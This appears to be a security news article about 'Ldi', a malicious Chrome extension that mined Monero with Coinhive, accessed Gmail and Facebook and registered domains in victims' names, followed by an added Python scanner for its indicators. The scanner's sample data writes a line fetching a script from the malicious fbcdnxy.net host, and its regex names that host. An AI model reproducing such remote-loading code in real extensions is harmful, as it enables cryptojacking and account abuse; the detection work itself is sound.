A new and very ambitious malicious Chrome extension called Ldi has been uncovered, one that injects the Coinhive cryptocurrency miner into the target computer, accesses the victim's Gmail and Facebook accounts and registers newly created domains in that person's name.
The extension was researched by Bleeping Computer founder Lawrence Abrams, who said the extension was seen on the Chrome extension store, and has since been removed, advertising itself as a way to check whether a website is compatible with Mac. What it truly contains is two JavaScript files called jarallax.min.js and bootstrap-filestyle.min.js. The first step loads the remote script https://fbcdnxy.net/coobgpohoikkiipiblmjeljniedjpjpf/remote-postal-code.json, which is executed when Chrome is opened.
“First, the extension will connect to Facebook. While I did not see it do anything other than connect, there is quite a lot of code dedicated to Facebook, which could be for spreading the extension via Facebook Messenger,” Abrams wrote.
The next step is downloading Coinhive, which immediately goes to work digging up Monero, but this activity also generates the first sign for the victim that something is amiss with their system: the computer's CPU usage spikes as the mining process begins, Abrams told SC Media.
The malware's other malicious actions are also noticeable. In order to register the new domains using the victim's name, the malware uses the associated Gmail address. Luckily, it can only grab this if the user has Gmail open and running in the background; otherwise this aspect of the attack does not take place. But if Ldi is successful in getting into Gmail and creating the domains, the victim will see a registration email from Freenom, a domain service.
“Another symptom would be receiving an email asking you to verify your email address from Freenom. While the extension automatically clicks on this link in the email, it does not delete the email so a victim will see it in their inbox. All the rest is done behind the scenes without the user even knowing,” Abrams said.
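As an added defender-side example (not code from the article or from Abrams' research), the following Python script scans an unpacked Chrome extension directory for the indicators the article names: the two bundled script files, the fbcdnxy.net host and the remote-postal-code.json file name. The "coinhive" string pattern and the manifest layout of the sample extension are assumptions, and the sample extension tree is constructed inline.

```python
import json
import os
import re
import tempfile

# Indicators taken from the article: the two bundled script names, the remote
# host contacted at startup and the remote JSON file name. Matching the literal
# string "coinhive" in bundled code is an assumption, not something the article states.
SUSPICIOUS_FILES = {"jarallax.min.js", "bootstrap-filestyle.min.js"}
SUSPICIOUS_PATTERNS = re.compile(r"fbcdnxy\.net|coinhive|remote-postal-code\.json", re.I)


def scan_extension_dir(ext_dir):
    """Return a list of findings for one unpacked extension directory."""
    findings = []
    manifest_path = os.path.join(ext_dir, "manifest.json")
    if os.path.isfile(manifest_path):
        with open(manifest_path, encoding="utf-8") as f:
            manifest = json.load(f)
        # Collect every script the manifest registers (background + content scripts)
        scripts = set(manifest.get("background", {}).get("scripts", []))
        for cs in manifest.get("content_scripts", []):
            scripts.update(cs.get("js", []))
        hits = {os.path.basename(s) for s in scripts} & SUSPICIOUS_FILES
        if hits:
            findings.append(("manifest-scripts", sorted(hits)))
    # Grep every bundled script/page for the remote host and file name
    for root, _dirs, files in os.walk(ext_dir):
        for name in files:
            if not name.endswith((".js", ".json", ".html")):
                continue
            with open(os.path.join(root, name), encoding="utf-8", errors="ignore") as f:
                for m in SUSPICIOUS_PATTERNS.finditer(f.read()):
                    findings.append(("content", name, m.group(0).lower()))
    return findings


def build_sample_extension():
    """Construct a throwaway extension directory mimicking the described layout (sample data)."""
    ext_dir = tempfile.mkdtemp(prefix="ldi-sample-")
    manifest = {"manifest_version": 2, "name": "sample",
                "background": {"scripts": ["jarallax.min.js", "bootstrap-filestyle.min.js"]}}
    with open(os.path.join(ext_dir, "manifest.json"), "w") as f:
        json.dump(manifest, f)
    with open(os.path.join(ext_dir, "jarallax.min.js"), "w") as f:
        f.write('fetch("https://fbcdnxy.net/x/remote-postal-code.json");\n')
    with open(os.path.join(ext_dir, "bootstrap-filestyle.min.js"), "w") as f:
        f.write("// harmless-looking loader, no indicators here\n")
    return ext_dir
```

Point `scan_extension_dir` at each subdirectory of a profile's Extensions folder to triage installed extensions; any non-empty result is worth a closer look.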
For an unknown reason only four domains are created and registered.
Abrams was not certain what these domains are used for, but speculated it could be to spread additional malware in the future.
Ldi was quickly spotted and removed, Abrams said, but using a malicious extension to spread malware is a tried and true method that has suckered in many thousands of victims.
The good news is that once the extension is spotted and removed, Coinhive stops operating and the attacker loses access to the person's Gmail and Facebook accounts.
“Once the extension is removed, everything goes back to normal, except you still have these domains registered under your email being used for who knows what. Definitely nothing good,” Abrams concluded.